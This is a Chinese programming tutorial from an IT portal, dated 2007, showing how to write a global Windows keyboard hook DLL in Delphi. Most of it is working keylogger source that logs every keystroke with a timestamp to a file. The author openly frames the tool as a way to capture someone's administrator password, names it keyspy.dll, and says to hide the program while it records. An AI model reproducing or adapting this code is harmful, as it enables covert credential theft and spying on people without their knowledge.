首页 | 互联网 | IT动态 | IT培训 | Cisco | Windows | Linux | Java | .Net | Oracle | 软件测试 | C/C++ | 嵌入式开发 | 存储世界 | 服务器
网络设备 | IDC | 安全 | 求职招聘 | 数字网校 | 网页设计 | 平面设计 | 技术专题 | 电子书下载 | 教学视频 | 源码下载 | 搜索 | 博客 | 论坛
首页 | JAVA | C# | VB | VB.NET | C/C++ | delphi | 工程管理 | 其他语言 | 论坛
各大城市软件开发培训、软件人才免费咨询热线:400-700-5807
 您现在的位置: 中国IT实验室 >> 桌面开发 >> Delphi >> 正文
Delphi编程使用HOOK监视Windows
来源:ChinaItLab 作者:佚名 时间:2007-4-5

  每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。
  
  下面就来举个例子(使用Delphi7.0调试通过):
  
  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?
  
  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。
  
  写个DLL定义一下函数
  
  function setkeyhook:bool;export;
  function endkeyhook:bool;export;
  procedure keyhookexit;far;
  procedure SetMainHandle(Handle: HWND); export;forward;
  function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
  
  procedure EntryPointProc(Reason: Integer);
  const
  hMapObject: THandle = 0;
  begin
  case reason of
  DLL_PROCESS_ATTACH:
  begin
  hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
  rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
  end;
  DLL_PROCESS_DETACH:
  begin
  try
  UnMapViewOfFile(rHookRec);
  CloseHandle(hMapObject);
  except
  end;
  end;
  end;
  end;
  procedure keyhookexit;far;
  begin
  if hNexthookproc<>0 then endkeyhook;
  exitproc:=procsaveexit;
  end;
  function endkeyhook:bool;export;
  begin
  if hNexthookproc<>0 then
  begin
  unhookwindowshookex(hNexthookproc);
  hNexthookproc:=0;
  messagebeep(0);
  end;
  result:=hNexthookproc=0;
  MainHandle:=0;
  end;
  
  function Setkeyhook:bool;export;
  begin
  hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
  result:=hNexthookproc<>0;
  end;
  function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
  var
  s:Tstringlist;
  begin
  if icode<0 then
  begin
  result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
  exit;
  end;
  if lparam<0 then
  begin
  exit;
  end;
  s:=TStringlist.Create;
  if FileExists(afilename) then
  s.LoadFromFile(afilename);
  
  //将敲打的键盘字符保存到文件中
  s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
  s.SaveToFile(afilename);
  s.Free;
  
  result:=0;
  end;
  
  Dll的Project文件中定义如下
  
  exports
  setkeyhook index 1,
  endkeyhook index 2,
  SetMainHandle index 3;
  
  begin
  hNexthookproc:=0;
  procsaveexit:=exitproc;
  DllProc := @EntryPointProc;
  EntryPointProc(DLL_PROCESS_ATTACH);
  end.
  
  这样DLL就定义好了,接下来就是画个界面:
  
  function setkeyhook:bool;external ’keyspy.dll’;
  function endkeyhook:bool;external ’keyspy.dll’;
  procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;
  //开始捕获键盘
  SetMainHandle(handle);
  setkeyhook
  //中止捕获键盘
  endkeyhook
  
  然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。
  
  另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。
【责编:landss】
中国IT教育热线咨询
相关文章
Delphi初学者应小心的六大陷阱
基于Delphi的异常处理技术探究
Delphi中用API实现在MSN的信息提示
用VB.NET定制Windows控件
Delphi中"包"的妙用…
VB.NET中监视文件夹的变化
如何用Delphi实现子目录级的文件查询
在Delphi数据库应用程序中常见错误
如何使用Delphi实现无边界窗体的移动
如何用Delphi创建快捷方式
推荐文章

 精彩友情推荐
·Asp源码 PHP源码
·CGI源码 JSP源码
·建站书籍教程
·服务器软件 .net源码
·建站工具软件
·IDC资讯大全
·机房品质万里行
·IDC托管必备知识
·全国IDC报价
·网站推广优化
最新更新 推荐文章
·框架:J2EE WEB应用架构分析…03-13
·几种VC++数据库开发技术的相对比…03-13
·利用C#实现标注式消息提示窗口03-13
·用C#创建COM对象03-13
·Visual C#多线程参数传递浅析…03-13
·Visual C#多线程参数传递浅析…03-13
·基于HOOK和MMF的Win密码渗透技术11-15
·Visual C++设计超强仿QQ自动伸缩…11-15
·Java SE 6.0实现高质量桌面集成开…11-15
·史玉柱东山再起幕后高人11-15
·用C#创建COM对象09-06
·IT管理十大失误及其对策08-30
·VC中利用MFC设计绘图程序初步08-23
·JAVA中对象创建和初始化过程08-23
·C语言中的位域的使用08-09
·浅谈Java桌面应用程序开发08-09
·C#的前途如何?08-02
·几种VC++数据库开发技术的相对比较07-12
·用Visual C#实现网络封包监视…07-12
·VB.NET中的TextBox控件详解07-12
·VB.NET实现PC与掌上电脑PPC的双向通信07-05